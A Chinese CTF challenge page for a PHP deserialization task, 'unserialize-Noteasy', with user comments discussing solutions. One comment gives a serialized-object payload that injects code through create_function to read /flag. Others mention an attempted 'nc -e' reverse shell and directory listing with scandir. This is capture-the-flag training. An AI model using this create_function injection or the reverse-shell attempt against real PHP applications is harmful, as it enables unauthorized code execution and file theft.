unserialize-NoteasyWEB 未解决
分数:
30
金币:
3
题目作者:
云牧青
一 血:
⎝Lazzaro⎠
一血奖励:
5金币
解 决:
288
提 示:
描 述:
不简单的反序列化
评论
笨笨笨蛋 1年前
举报
寄了,不会
18679066006 1年前
举报
$s=new Noteasy('create_function',';};highlight_file("/flag");/*'); echo urlencode(serialize($s));
a1037214089 1年前
举报
家人们 那个wp里的$b 为什么不需要考虑闭合的问题啊?create_function("",;}show_source('/flag');/*在语法上不会报错吗?我构造了一个能够闭合create_function的(的payload 结果不行....
v3277293 1年前
举报
哇,终于做出来了
W01fh4cker 1年前
举报
提示:本题关键在于$a("", $b);,同时本题环境不是PHP7.2,是PHP5;查看flag可以是highlight_file也可以是show_source。
ShawRoot 1年前
举报
不用那么麻烦,直接使用highlight_file就可以查看flag。
既不萌也不新的萌新HZ 2年前
举报
nc -e 报错,不知道该怎么办了,提示不支持-e选项
既不萌也不新的萌新HZ 2年前
举报
没反弹成功,还好没有禁掉其他函数。 拿scandir+var_dump搜索目录(替代ls),然后使用die+fread+fopen组合梭绕过echo限制读取flag并显示。目录好像不可写。。。
18807322800 1年前
举报
能把var_dump的payload发一下吗?
hdfzzf 2年前
举报
终于学会了!!!
0xff0000 2年前
举报
参考 p神 2018 code-breaking 的 easy-function,利用 create_function 来解